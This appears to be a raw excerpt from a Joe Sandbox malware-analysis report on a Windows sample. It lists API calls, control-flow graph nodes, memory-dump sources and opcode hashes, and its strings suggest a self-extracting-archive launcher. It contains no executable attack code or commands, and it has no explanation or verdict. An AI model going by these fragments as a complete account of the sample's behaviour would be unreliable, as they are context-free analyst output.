                                                                                                                                  • String ID: \
                                                                                                                                  • API String ID: 3569833718-2967466578
                                                                                                                                  • Opcode ID: 73ccd00fa871cbfc58966e710d117410b1906aebbfe96bd6892e068fbf2067f7
                                                                                                                                  • Instruction ID: 81cbf61025f64f27ea29df1b4c8a5baee3b4788cf5f381ffbc60e917576e48d7
                                                                                                                                  • Opcode Fuzzy Hash: 73ccd00fa871cbfc58966e710d117410b1906aebbfe96bd6892e068fbf2067f7
                                                                                                                                  • Instruction Fuzzy Hash: F531C171149346BFE311DF249C4AFAB7FACFB86708F004508F551D62A0EB758A0497B6

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • _wcslen.LIBCMT ref: 008BD7AE
                                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 008BD8DE
                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 008BD91D
                                                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 008BD959
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 008BD97F
                                                                                                                                  • ShowWindow.USER32(?,00000001), ref: 008BD9E1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                                                                  • String ID: .exe$.inf
                                                                                                                                  • API String ID: 36480843-3750412487
                                                                                                                                  • Opcode ID: a9d3c4ae2c1946b185c9c44cebdaa606e2d4136a2d990eaab2f00fb983284e42
                                                                                                                                  • Instruction ID: fc14dff717a342eab285462189f6867ea2bd8bfaecb785fb4f2a5d0073953cf6
                                                                                                                                  • Opcode Fuzzy Hash: a9d3c4ae2c1946b185c9c44cebdaa606e2d4136a2d990eaab2f00fb983284e42
                                                                                                                                  • Instruction Fuzzy Hash: 4051AD70008384AAEB219B249844BEBBFE4FF46744F04482EE9C4DB3A1F7718989C752

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,008C5695,008C5695,?,?,?,008CABAC,00000001,00000001,2DE85006), ref: 008CA9B5
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,008CABAC,00000001,00000001,2DE85006,?,?,?), ref: 008CAA3B
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 008CAB35
                                                                                                                                  • __freea.LIBCMT ref: 008CAB42
                                                                                                                                    • Part of subcall function 008C8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008CCA2C,00000000,?,008C6CBE,?,00000008,?,008C91E0,?,?,?), ref: 008C8E38
                                                                                                                                  • __freea.LIBCMT ref: 008CAB4B
                                                                                                                                  • __freea.LIBCMT ref: 008CAB70
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1414292761-0

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 975 8c3b72-8c3b7c 976 8c3bee-8c3bf1 975->976 977 8c3b7e-8c3b8c 976->977 978 8c3bf3 976->978 980 8c3b8e-8c3b91 977->980 981 8c3b95-8c3bb1 LoadLibraryExW 977->981 979 8c3bf5-8c3bf9 978->979 982 8c3c09-8c3c0b 980->982 983 8c3b93 980->983 984 8c3bfa-8c3c00 981->984 985 8c3bb3-8c3bbc GetLastError 981->985 982->979 987 8c3beb 983->987 984->982 986 8c3c02-8c3c03 FreeLibrary 984->986 988 8c3bbe-8c3bd3 call 8c6088 985->988 989 8c3be6-8c3be9 985->989 986->982 987->976 988->989 992 8c3bd5-8c3be4 LoadLibraryExW 988->992 989->987 992->984 992->989
                                                                                                                                  APIs
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,008C3C35,?,?,00902088,00000000,?,008C3D60,00000004,InitializeCriticalSectionEx,008D6394,InitializeCriticalSectionEx,00000000), ref: 008C3C03
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                  • String ID: api-ms-
                                                                                                                                  • API String ID: 3664257935-2084034818

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008B081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008B0836
                                                                                                                                    • Part of subcall function 008B081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,008AF2D8,Crypt32.dll,00000000,008AF35C,?,?,008AF33E,?,?,?), ref: 008B0858
                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 008BAC2F
                                                                                                                                  • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 008BAC66
                                                                                                                                  • SHGetMalloc.SHELL32(008E8438), ref: 008BAC70
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                                                  • String ID: riched20.dll$3Ro
                                                                                                                                  • API String ID: 3498096277-3613677438

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 997 8a98e0-8a9901 call 8bec50 1000 8a990c 997->1000 1001 8a9903-8a9906 997->1001 1002 8a990e-8a991f 1000->1002 1001->1000 1003 8a9908-8a990a 1001->1003 1004 8a9921 1002->1004 1005 8a9927-8a9931 1002->1005 1003->1002 1004->1005 1006 8a9933 1005->1006 1007 8a9936-8a9943 call 8a6edb 1005->1007 1006->1007 1010 8a994b-8a996a CreateFileW 1007->1010 1011 8a9945 1007->1011 1012 8a99bb-8a99bf 1010->1012 1013 8a996c-8a998e GetLastError call 8abb03 1010->1013 1011->1010 1015 8a99c3-8a99c6 1012->1015 1016 8a99c8-8a99cd 1013->1016 1022 8a9990-8a99b3 CreateFileW GetLastError 1013->1022 1015->1016 1017 8a99d9-8a99de 1015->1017 1016->1017 1019 8a99cf 1016->1019 1020 8a99ff-8a9a10 1017->1020 1021 8a99e0-8a99e3 1017->1021 1019->1017 1024 8a9a2e-8a9a39 1020->1024 1025 8a9a12-8a9a2a call 8b0602 1020->1025 1021->1020 1023 8a99e5-8a99f9 SetFileTime 1021->1023 1022->1015 1026 8a99b5-8a99b9 1022->1026 1023->1020 1025->1024 1026->1015
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,008A7760,?,00000005,?,00000011), ref: 008A995F
                                                                                                                                  • GetLastError.KERNEL32(?,?,008A7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008A996C
                                                                                                                                  • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,008A7760,?,00000005,?), ref: 008A99A2
                                                                                                                                  • GetLastError.KERNEL32(?,?,008A7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008A99AA
                                                                                                                                  • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,008A7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008A99F9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CreateErrorLast$Time
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1999340476-0

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 1056 8bb568-8bb581 PeekMessageW 1057 8bb5bc-8bb5be 1056->1057 1058 8bb583-8bb597 GetMessageW 1056->1058 1059 8bb599-8bb5a6 IsDialogMessageW 1058->1059 1060 8bb5a8-8bb5b6 TranslateMessage DispatchMessageW 1058->1060 1059->1057 1059->1060 1060->1057
                                                                                                                                  APIs
                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008BB579
                                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008BB58A
                                                                                                                                  • IsDialogMessageW.USER32(00010424,?), ref: 008BB59E
                                                                                                                                  • TranslateMessage.USER32(?), ref: 008BB5AC
                                                                                                                                  • DispatchMessageW.USER32(?), ref: 008BB5B6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1266772231-0

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 1061 8babab-8babca GetClassNameW 1062 8babcc-8babe1 call 8b1fbb 1061->1062 1063 8babf2-8babf4 1061->1063 1068 8babe3-8babef FindWindowExW 1062->1068 1069 8babf1 1062->1069 1064 8babff-8bac01 1063->1064 1065 8babf6-8babf9 SHAutoComplete 1063->1065 1065->1064 1068->1069 1069->1063
                                                                                                                                  APIs
                                                                                                                                  • GetClassNameW.USER32(?,?,00000050), ref: 008BABC2
                                                                                                                                  • SHAutoComplete.SHLWAPI(?,00000010), ref: 008BABF9
                                                                                                                                    • Part of subcall function 008B1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,008AC116,00000000,.exe,?,?,00000800,?,?,?,008B8E3C), ref: 008B1FD1
                                                                                                                                  • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 008BABE9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                                  • String ID: EDIT
                                                                                                                                  • API String ID: 4243998846-3080729518

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 1070 8bdbde-8bdc09 call 8bec50 SetEnvironmentVariableW call 8b0371 1074 8bdc0e-8bdc12 1070->1074 1075 8bdc36-8bdc38 1074->1075 1076 8bdc14-8bdc18 1074->1076 1077 8bdc21-8bdc28 call 8b048d 1076->1077 1080 8bdc1a-8bdc20 1077->1080 1081 8bdc2a-8bdc30 SetEnvironmentVariableW 1077->1081 1080->1077 1081->1075
                                                                                                                                  APIs
                                                                                                                                  • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 008BDBF4
                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 008BDC30
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EnvironmentVariable
                                                                                                                                  • String ID: sfxcmd$sfxpar
                                                                                                                                  • API String ID: 1431749950-3493335439
                                                                                                                                  • Opcode ID: 1d9f9eb6f315e6d8807682a0439de70f83833ffed51329de5618fab2e9c1932c
                                                                                                                                  • Instruction ID: 06d18667d1f9a5fd78f92449bf673a1724ff6a273d852c675025ea4abfe173ac
                                                                                                                                  • Opcode Fuzzy Hash: 1d9f9eb6f315e6d8807682a0439de70f83833ffed51329de5618fab2e9c1932c
                                                                                                                                  • Instruction Fuzzy Hash: 52F0A772405339BACF211F988C06BEB3F98FF15785B040512BD85D5351E6B48940D6B1

                                                                                                                                  Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                  APIs
                                                                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 008A9795
                                                                                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 008A97AD
                                                                                                                                  • GetLastError.KERNEL32 ref: 008A97DF
                                                                                                                                  • GetLastError.KERNEL32 ref: 008A97FE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$FileHandleRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2244327787-0
                                                                                                                                  • Opcode ID: f6f81997cc2e2a59b73ea7b554ad0030c9320a8634d980f4630482ea5e5b67dc
                                                                                                                                  • Instruction ID: da49acf633eab5c92fc15aead0416aad99f0ae308ea668a97da2f528f1c766ba
                                                                                                                                  • Opcode Fuzzy Hash: f6f81997cc2e2a59b73ea7b554ad0030c9320a8634d980f4630482ea5e5b67dc
                                                                                                                                  • Instruction Fuzzy Hash: 5F11A530918608EBFF205F68C804A6937A9FB43724F20863AF496C5990E778DE44DB62
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,008C3F73,00000000,00000000,?,008CACDB,008C3F73,00000000,00000000,00000000,?,008CAED8,00000006,FlsSetValue), ref: 008CAD66
                                                                                                                                  • GetLastError.KERNEL32(?,008CACDB,008C3F73,00000000,00000000,00000000,?,008CAED8,00000006,FlsSetValue,008D7970,FlsSetValue,00000000,00000364,?,008C98B7), ref: 008CAD72
                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,008CACDB,008C3F73,00000000,00000000,00000000,?,008CAED8,00000006,FlsSetValue,008D7970,FlsSetValue,00000000), ref: 008CAD80
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                  • Opcode ID: 2c88e9f83c1d060f21f0f20306e9359e898428e54e4e3d6501b7b87e321fe9ed
                                                                                                                                  • Instruction ID: 09ce43f4dc83682a67b2986c25de1d0ff6cda9cfc49b896e633e5efabb1475ee
                                                                                                                                  • Opcode Fuzzy Hash: 2c88e9f83c1d060f21f0f20306e9359e898428e54e4e3d6501b7b87e321fe9ed
                                                                                                                                  • Instruction Fuzzy Hash: 2F01D43661222EAFC7254B68AC48F567BB8FF05BAB7114729FA07D3550DB31DC0186E2
                                                                                                                                  APIs
                                                                                                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,008AD343,00000001,?,?,?,00000000,008B551D,?,?,?), ref: 008A9F9E
                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,008B551D,?,?,?,?,?,008B4FC7,?), ref: 008A9FE5
                                                                                                                                  • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,008AD343,00000001,?,?), ref: 008AA011
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite$Handle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4209713984-0
                                                                                                                                  • Opcode ID: 2e8d38d306e0688effc823259dae7ac0955b4bc13500657e700707d5fbb2c814
                                                                                                                                  • Instruction ID: 32d2cb527db70467524f80e1c9978c94b6d58d5ce3b3adba7ada13e38b298bb1
                                                                                                                                  • Opcode Fuzzy Hash: 2e8d38d306e0688effc823259dae7ac0955b4bc13500657e700707d5fbb2c814
                                                                                                                                  • Instruction Fuzzy Hash: DC31BF31208309EFEB18CF24D808B6A77A5FB86715F044619F981D7A90CB75AD48CBA2
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008AC27E: _wcslen.LIBCMT ref: 008AC284
                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,008AA175,?,00000001,00000000,?,?), ref: 008AA2D9
                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,008AA175,?,00000001,00000000,?,?), ref: 008AA30C
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,008AA175,?,00000001,00000000,?,?), ref: 008AA329
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2260680371-0
                                                                                                                                  • Opcode ID: a59aa01b9c653988c990986e680ab6eb27ade774b82d6824c8d2b5b3106363e5
                                                                                                                                  • Instruction ID: 3599c581c7e9598aa8e78c996cf63e134932de5cfe26389b46c0829efd19043a
                                                                                                                                  • Opcode Fuzzy Hash: a59aa01b9c653988c990986e680ab6eb27ade774b82d6824c8d2b5b3106363e5
                                                                                                                                  • Instruction Fuzzy Hash: 0A019E21201614AAFF39AB794C09BFD2788FF1B781F044415F902E6E81E764CA81C6B7
                                                                                                                                  APIs
                                                                                                                                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 008CB8B8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Info
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1807457897-3916222277
                                                                                                                                  • Opcode ID: 091323d86496b1196ed1818fe456fb340a032c0565fe5cfb538c68d6c3fbeaef
                                                                                                                                  • Instruction ID: b7f35a42322e8c92d51e5a5540d762015d573f6c2718f9138cde58c0b117a3e7
                                                                                                                                  • Opcode Fuzzy Hash: 091323d86496b1196ed1818fe456fb340a032c0565fe5cfb538c68d6c3fbeaef
                                                                                                                                  • Instruction Fuzzy Hash: C241F67050469C9ADF218E28CC85FF6BBB9FB45308F1404EDE6DAC6142E335EA498B61
                                                                                                                                  APIs
                                                                                                                                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 008CAFDD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String
                                                                                                                                  • String ID: LCMapStringEx
                                                                                                                                  • API String ID: 2568140703-3893581201
                                                                                                                                  • Opcode ID: 84ba458c78964385ad25f0213e0c64eed42c4c3689fcd1e5eab092baefd0c04f
                                                                                                                                  • Instruction ID: dfb65b7a0e36be2f25657483418ba6293d3e8fb74dcfd6d81813d704fcd22ff1
                                                                                                                                  • Opcode Fuzzy Hash: 84ba458c78964385ad25f0213e0c64eed42c4c3689fcd1e5eab092baefd0c04f
                                                                                                                                  • Instruction Fuzzy Hash: 2C01293250510DBBCF166F90DC05EEE7F62FF08754F01425AFE14A6260CA76C931AB82
                                                                                                                                  APIs
                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,008CA56F), ref: 008CAF55
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                  • String ID: InitializeCriticalSectionEx
                                                                                                                                  • API String ID: 2593887523-3084827643
                                                                                                                                  • Opcode ID: 0dc12bba643ee64982523a673a574c2dc22e1bd8d531ed37cfde0ab9ce9b06c8
                                                                                                                                  • Instruction ID: 9a9215cd95cf1bdfb6d7ea4e8007e9dc610c44706c6a2232bdccf8a45e8ec6f1
                                                                                                                                  • Opcode Fuzzy Hash: 0dc12bba643ee64982523a673a574c2dc22e1bd8d531ed37cfde0ab9ce9b06c8
                                                                                                                                  • Instruction Fuzzy Hash: 82F0B43264621CBBCF165F55CC16D9D7F61FF04B11B40426AFD18EA360EE358A109786
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Alloc
                                                                                                                                  • String ID: FlsAlloc
                                                                                                                                  • API String ID: 2773662609-671089009
                                                                                                                                  • Opcode ID: 486d12248b91d884b18a065bb0140a05d0637272abb1a8484019a511b2602a0e
                                                                                                                                  • Instruction ID: 016289d6f7fd225b93a8b657e9aa94f5698d88030d4e39cca087670809b8d51d
                                                                                                                                  • Opcode Fuzzy Hash: 486d12248b91d884b18a065bb0140a05d0637272abb1a8484019a511b2602a0e
                                                                                                                                  • Instruction Fuzzy Hash: 9EE05C3264121C77C6046B65CC12E6D7B60FB04721B40025AF805D7340DD388E0042CB
                                                                                                                                  APIs
